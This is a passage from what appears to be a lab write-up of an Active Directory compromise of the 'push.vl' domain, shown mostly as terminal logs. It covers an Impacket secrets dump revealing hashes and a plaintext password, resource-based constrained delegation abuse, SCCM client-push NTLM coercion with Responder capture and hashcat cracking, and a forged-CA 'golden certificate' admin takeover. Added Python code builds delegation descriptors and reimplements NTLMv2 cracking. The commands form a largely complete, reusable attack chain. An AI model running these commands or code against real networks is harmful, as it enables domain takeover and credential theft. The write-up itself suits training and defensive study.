[*] Wrote 1632 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Sliver/administrator_cifs_MS01.push.vl
Dumping SAM database and LSA Secrets
❯ impacket-ticketConverter admin2.kirbi admin2.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
❯ KRB5CCNAME=admin2.ccache impacket-secretsdump -k MS01.PUSH.VL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8614aef7e81821c71123195fd93f661:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31)
push.vl/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2025-05-12 03:34:55)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUSH\MS01$:plain_password_hex:a8588fd11b4f63e1b5a84c2d2cdc4bcae3545f793c7228a77e1ad868edbb9e701ab3e81c4d8c864e58b3d7a01faaeff9facf4536a4129cdae629bdbf445c5a66e6bd6382f3e9184613bdb6031d6c0e04cd123e26ce746c5f0727e81e78ac7d69f2b9b7f5b5d8d8c5c8019e03a7333a5cca60683f3d9c72b0a828bcd04d36a0ba5fd99774d76d609d632641a2047be57041bd3d331872416ba5309f323219cd8d2c608e17153e731a689adfcf7a0163d84477cc1f2d60d63a61b5056a15d2ab00394db19fe60c91380a6495a824b63bf3008de0dbd74b044b5e04a4741f71a1dd224fc60e35c19eb226848814b101c6f6
PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:31fd133d27babb3790e451b6aeea7886:::
[*] DefaultPassword
PUSH\kelly.hill:ShinraTensei!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691
dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Path 1: Privilege escalation on MS01 via RBCD (Linux)
Creating Computer Account
❯ impacket-addcomputer 'push.vl/kelly.hill:ShinraTensei!' -computer-name 'Intrusion' -computer-pass 'Password123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account Intrusion$ with password Password123.
Writing msds-allowedtoactonbehalfofotheridentity attribute to MS01
❯ impacket-rbcd -delegate-from Intrusion$ -delegate-to MS01$ -action write 'push.vl/kelly.hill:ShinraTensei!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*] z3r0$ (S-1-5-21-1451457175-172047642-1427519037-3602)
[*] Delegation rights modified successfully!
[*] Intrusion$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] z3r0$ (S-1-5-21-1451457175-172047642-1427519037-3602)
[*] Intrusion$ (S-1-5-21-1451457175-172047642-1427519037-3603)
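The long byte string PowerView printed when setting msds-allowedtoactonbehalfofotheridentity in Path 1 (Windows) is the self-relative security descriptor built from the SDDL O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>), and impacket-rbcd -action read decodes the same structure back into the SIDs listed just above. The Python below is an added example for this write-up, not code from the original page, PowerView or impacket: it builds that descriptor from a machine-account SID without any Windows API, checks that the result is byte-for-byte the value PowerView wrote (z3r0$ is RID 3602 in the impacket output), and parses a descriptor back into its trustees. The domain SID comes from the nxc output and the Intrusion$ RID (3603) from the impacket-rbcd output above.

```python
import struct

# Field values from the SDDL used with Set-DomainObject above:
# owner BA, one ACCESS_ALLOWED ACE granting CCDCLCSWRPWPDTLOCRSDRCWDWO (0x000F01FF).
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
ADS_RIGHT_GENERIC_ALL = 0x000F01FF
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0

DOMAIN_SID = "S-1-5-21-1451457175-172047642-1427519037"   # push.vl domain SID (nxc output above)
Z3R0_SID = DOMAIN_SID + "-3602"                           # z3r0$ per impacket-rbcd's read-back
INTRUSION_SID = DOMAIN_SID + "-3603"                      # Intrusion$ per the same output

# The exact bytes PowerView logged for Set-DomainObject on MS01$ in Path 1 (Windows).
POWERVIEW_BYTES = bytes([
    1, 0, 4, 128, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0,
    1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0,
    2, 0, 44, 0, 1, 0, 0, 0, 0, 0, 36, 0, 255, 1, 15, 0,
    1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 151, 122, 131, 86,
    26, 61, 65, 10, 61, 54, 22, 85, 18, 14, 0, 0])


def sid_to_bytes(sid: str) -> bytes:
    """Text SID -> binary SID: revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a SID: {sid}")
    subs = [int(p) for p in parts[3:]]
    return struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big") + struct.pack(f"<{len(subs)}I", *subs)


def bytes_to_sid(buf: bytes, off: int = 0) -> str:
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return f"S-{rev}-{authority}-" + "-".join(str(s) for s in subs)


def build_rbcd_sd(trustee_sids, owner: str = BUILTIN_ADMINISTRATORS) -> bytes:
    """Self-relative security descriptor for msDS-AllowedToActOnBehalfOfOtherIdentity."""
    aces = b""
    for sid in trustee_sids:
        sid_b = sid_to_bytes(sid)
        # ACE: type, flags, size, access mask, trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), ADS_RIGHT_GENERIC_ALL) + sid_b
    # ACL header: revision 2, sbz1, total size, ACE count, sbz2
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    owner_b = sid_to_bytes(owner)
    header_len = 20
    # SD header: revision, sbz1, control, then owner/group/SACL/DACL offsets (group and SACL absent)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         header_len, 0, 0, header_len + len(owner_b))
    return header + owner_b + dacl


def parse_rbcd_sd(buf: bytes):
    """(SID, mask) for every ACCESS_ALLOWED ACE: the accounts allowed to act on behalf of other identity."""
    _rev, _sbz, control, _o_owner, _o_group, _o_sacl, o_dacl = struct.unpack_from("<BBHIIII", buf, 0)
    if not control & SE_DACL_PRESENT or o_dacl == 0:
        return []
    _acl_rev, _sbz1, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", buf, o_dacl)
    off = o_dacl + 8
    trustees = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", buf, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            trustees.append((bytes_to_sid(buf, off + 8), mask))
        off += ace_size
    return trustees


if __name__ == "__main__":
    sd = build_rbcd_sd([Z3R0_SID, INTRUSION_SID])
    for sid, mask in parse_rbcd_sd(sd):
        print(f"{sid} mask=0x{mask:08X}")
```

Reading the attribute back with this parser is the same check impacket-rbcd -action read performs: every SID it lists can obtain a service ticket to MS01 as any non-protected user, so a blue team should treat unexpected entries on a server's computer object as a standing backdoor.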
Requesting a service ticket (S4U2self + S4U2proxy) as Administrator
❯ impacket-getST 'push.vl/Intrusion$:Password123' -spn 'CIFS/MS01.PUSH.VL' -impersonate Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_MS01.PUSH.VL@PUSH.VL.ccache
Dumping SAM database and LSA Secrets
❯ KRB5CCNAME='Administrator@CIFS_MS01.PUSH.VL@PUSH.VL.ccache' impacket-secretsdump -k -no-pass MS01.PUSH.VL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
<SNIP> (identical to the Path 1 dump above: same SAM hashes, DCC2 cached entries, MS01$ machine account secret, DefaultPassword PUSH\kelly.hill:ShinraTensei!, DPAPI_SYSTEM and NL$KM keys)
Path 2: Privilege Escalation via SCCM Client Push (NTLM coercion, capture and cracking)
Discovering that MS01 is the Certificate Authority
sliver (http-vulnlabs-4444) > sa-adcs-enum
[*] Successfully executed sa-adcs-enum (coff-loader)
[*] Got output:
[*] Found 1 CAs in the domain
[*] Listing info for CN=CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=push,DC=vl
Enterprise CA Name : CA
DNS Hostname : MS01.push.vl
Flags : SUPPORTS_NT_AUTHENTICATION CA_SERVERTYPE_ADVANCED
Expiration : 1 years
CA Cert :
Subject Name : DC=vl, DC=push, CN=CA
Thumbprint : 9dd0081d82796853df4bfb79b3057c5aeaf0b15b
Serial Number : 72533888abc96d43a299917a621b857d
Start Date : 8/31/2023 07:25:21
End Date : 8/31/3022 07:35:21
Chain : DC=vl, DC=push, CN=CA
<SNIP>
Discovering Microsoft Endpoint Configuration Manager installed on MS01
# echo 'Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName,DisplayVersion,InstallLocation' | base64 -w0 | xclip -sel clip
sliver (http-vulnlabs-4444) > sharpsh -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxVbmluc3RhbGxcKiB8IFNlbGVjdCBEaXNwbGF5TmFtZSxEaXNwbGF5VmVyc2lvbixJbnN0YWxsTG9jYXRpb24K'
[*] sharpsh output:
DisplayName DisplayVersion InstallLocation
----------- -------------- ---------------
Amazon EC2Launch 2.0.1521.0
Microsoft .NET Host - 7.0.10 (x64) 56.43.64668
aws-cfn-bootstrap 2.0.26
Configuration Manager Client 5.00.9111.1000
<SNIP>
sliver (http-vulnlabs-4444) > execute-assembly /home/Intrusionz3r0/Documents/Tools/SharpCollection/NetFramework_4.7_x64/SharpSCCM.exe local site-info
[*] Output:
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2286036
Coercing SCCM NTLM Authentication
Registering a fake device with the management point and requesting client push installation for the attacker's IP makes the site server connect to that IP over SMB with the client push installation account (sccadmin) and the site server's machine account (DC01$); both NTLMv2 responses land on Responder below.
sliver (http-vulnlabs-4444) > sharpsccm invoke client-push -t 10.8.5.48
[*] sharpsccm output:
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: DC01.push.vl
[+] Site code: HQ0
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
<SNIP>
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: 10.8.5.48
NetBIOS name: 10.8.5.48
Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:
GUID:A6D63769-A669-41FD-BAD4-1FBCB0399C01
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:A6D63769-A669-41FD-BAD4-1FBCB0399C01 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.5.48
[+] Completed execution in 00:00:06.4432509
Retrieving NTLMv2 Hashes
❯ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[SMB] NTLMv2-SSP Client : 10.10.170.85
[SMB] NTLMv2-SSP Username : PUSH\sccadmin
[SMB] NTLMv2-SSP Hash : sccadmin::PUSH:aaaaaaaaaaaaaaaa:5b4978cb8424d7817455c8d75be9caac:0101000000000000006bc5f088c3db0189535b04c9036121000000000100100077006300700045004e004200450054000300100077006300700045004e00420045005400020010006d00490072005a004d0049007a006500040010006d00490072005a004d0049007a00650007000800006bc5f088c3db0106000400020000000800300030000000000000000000000000400000a4466ef19d5811bb4240ed56c011010ce7eda97943f24e4c68de6c803f22f8000a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000
[SMB] NTLMv2-SSP Client : 10.10.170.85
[SMB] NTLMv2-SSP Username : PUSH\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::PUSH:aaaaaaaaaaaaaaaa:93a4f8afc63fa09c142a924c8ac28a9d:010100000000000080015ef188c3db0179175cc0b27c3f02000000000100100077006300700045004e004200450054000300100077006300700045004e00420045005400020010006d00490072005a004d0049007a006500040010006d00490072005a004d0049007a0065000700080080015ef188c3db0106000400020000000800300030000000000000000000000000400000a4466ef19d5811bb4240ed56c011010ce7eda97943f24e4c68de6c803f22f8000a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000
Cracking sccadmin's NTLMv2 hash
❯ hashcat -m 5600 sccadmin /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
SCCADMIN::PUSH:4a38e3a4e3ca2b52:2dd5c9b84c96005d00225ed382dc85fd:<SNIP>:7ujm&UJM
Credentials found: sccadmin:7ujm&UJM
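hashcat -m 5600 recomputes, for every wordlist candidate, the NTLMv2 response that a Responder capture line carries and compares it with the NTProofStr field (the 16 bytes after the server challenge). The Python below is an added example for this write-up, not code from the original page or from hashcat; it shows that computation end to end: NT hash = MD4(UTF-16LE(password)), NTLMv2 key = HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain)), NTProofStr = HMAC-MD5(NTLMv2 key, server challenge || blob). MD4 is implemented in pure Python because hashlib's md4 is disabled in many OpenSSL 3 builds. The capture line it checks is constructed locally from a known password in the shape of the sccadmin line above (same user, domain and fixed Responder challenge, a minimal blob); it is not the real capture, whose blob was elided.

```python
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 in pure Python (hashlib's md4 is often unavailable under OpenSSL 3)."""
    F = lambda x, y, z: ((x & y) | (~x & z)) & MASK
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                       # round 1
            a = rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                       # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                       # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NT hash; nt_hash("") is the 31d6cfe0... value seen for Guest/DefaultAccount in the SAM dump above."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr exactly as the client computes it (and as hashcat -m 5600 recomputes it)."""
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, "md5").digest()


def parse_5600(line: str):
    """user::DOMAIN:server_challenge:ntproofstr:blob, the Responder / hashcat 5600 format."""
    user, _, domain, chal, proof, blob = line.strip().split(":", 5)
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def check_candidate(line: str, password: str) -> bool:
    user, domain, chal, proof, blob = parse_5600(line)
    return hmac.compare_digest(ntlmv2_proof(user, domain, password, chal, blob), proof)


def crack(line: str, wordlist):
    """First candidate that reproduces NTProofStr, or None (what hashcat does at scale)."""
    for candidate in wordlist:
        if check_candidate(line, candidate):
            return candidate
    return None


def make_5600_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a capture line from a known password; used only to construct offline test material."""
    proof = ntlmv2_proof(user, domain, password, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: Responder's fixed challenge aaaaaaaaaaaaaaaa and a minimal NTLMv2 blob
# (type 0x0101, reserved, timestamp, client nonce, reserved). Not the real sccadmin capture.
SAMPLE_BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + b"\x11" * 8 + b"\x00" * 4
SAMPLE_LINE = make_5600_line("sccadmin", "PUSH", "7ujm&UJM", bytes.fromhex("aaaaaaaaaaaaaaaa"), SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, ["123456", "Password1", "7ujm&UJM"]))
```

Because the blob is part of the HMAC input, a captured NTLMv2 response is only useful for offline cracking (or relaying while the session is live); it cannot be replayed against another server challenge, which is why the SCCM coercion above was paired with Responder rather than reused directly.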
Compromise Domain Controller DC01
Path 1: Golden Certificate Attack
MS01 hosts the enterprise CA, so with local Administrator on MS01 the CA certificate and private key (CA.pfx) can be exported and used to forge a certificate for any principal. The DC rejected the forged certificate for PKINIT (KDC_ERROR_CLIENT_NOT_TRUSTED), so Certipy's LDAPS (Schannel) authentication was used instead, which is enough to reset the Administrator password.
❯ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
❯ certipy-ad auth -pfx administrator_forged.pfx -username Administrator -domain push.vl -dc-ip 10.10.170.85
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@push.vl
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)
❯ certipy-ad auth -pfx administrator_forged.pfx -username Administrator -domain push.vl -dc-ip 10.10.170.85 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Connecting to 'ldaps://10.10.170.85:636'
[*] Authenticated to '10.10.170.85' as: u:PUSH\Administrator
Type help for list of commands
# change_password Administrator Password123!
Got User DN: CN=Administrator,CN=Users,DC=push,DC=vl
Attempting to set new password of: Password123!
Password changed successfully!
❯ xfreerdp /v:DC01 /u:Administrator /p:Password123! /dynamic-resolution

Path 2: Create a vulnerable template